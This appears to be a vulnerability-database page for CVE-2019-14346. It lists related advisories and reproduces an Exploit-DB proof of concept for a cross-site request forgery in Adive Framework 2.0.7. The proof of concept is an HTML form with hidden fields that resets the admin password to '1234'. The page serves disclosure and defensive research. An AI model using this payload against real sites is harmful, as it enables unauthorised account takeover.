| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| Adive Framework 2.0.7 - Cross-Site Request Forgery Vulnerability | 9 Aug 201900:00 | – | zdt | |
| Schben Adive Cross-Site Request Forgery Vulnerability | 7 Aug 201900:00 | – | cnvd | |
| CVE-2019-14346 | 6 Aug 201914:23 | – | cve | |
| CVE-2019-14346 | 6 Aug 201914:23 | – | cvelist | |
| Adive Framework 2.0.7 - Cross-Site Request Forgery | 8 Aug 201900:00 | – | exploitdb | |
| EUVD-2019-5562 | 7 Oct 202500:30 | – | euvd | |
| Adive Framework 2.0.7 - Cross-Site Request Forgery | 8 Aug 201900:00 | – | exploitpack | |
| CVE-2019-14346 | 6 Aug 201915:15 | – | nvd | |
| CVE-2019-14346 | 6 Aug 201915:15 | – | osv | |
| Cross site request forgery (csrf) | 6 Aug 201915:15 | – | prion |
`# Exploit Title: Adive Framework 2.0.7 – Cross-Site Request Forgery (CSRF)
# Date:02/08/2019.
# Exploit Author: Pablo Santiago
# Vendor Homepage: https://adive.es
# Software Link: https://github.com/ferdinandmartin/adive-php7
# Version: 2.0.7
# Tested on: Windows and Kali linux
# CVE :2019-14346
# 1. Technical Description:
# Adive Framework 2.0.7 and possibly before are affected by Cross-Site
#Request Forgery vulnerability, an attacker could change any user
password.
# 2. Proof Of Concept (CODE):
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/adive/admin/config" method="POST">
<input type="hidden" name="userName" value="admin" />
<input type="hidden" name="confPermissions" value="1" />
<input type="hidden" name="pass" value="1234" />
<input type="hidden" name="cpass" value="1234" />
<input type="hidden" name="invokeType" value="web" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
# 3. References:
# https://hackpuntes.com/cve-2019-14346-adive-framework-2-0-7-cross-site-request-forgery/
# https://imgur.com/apuZa9q
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation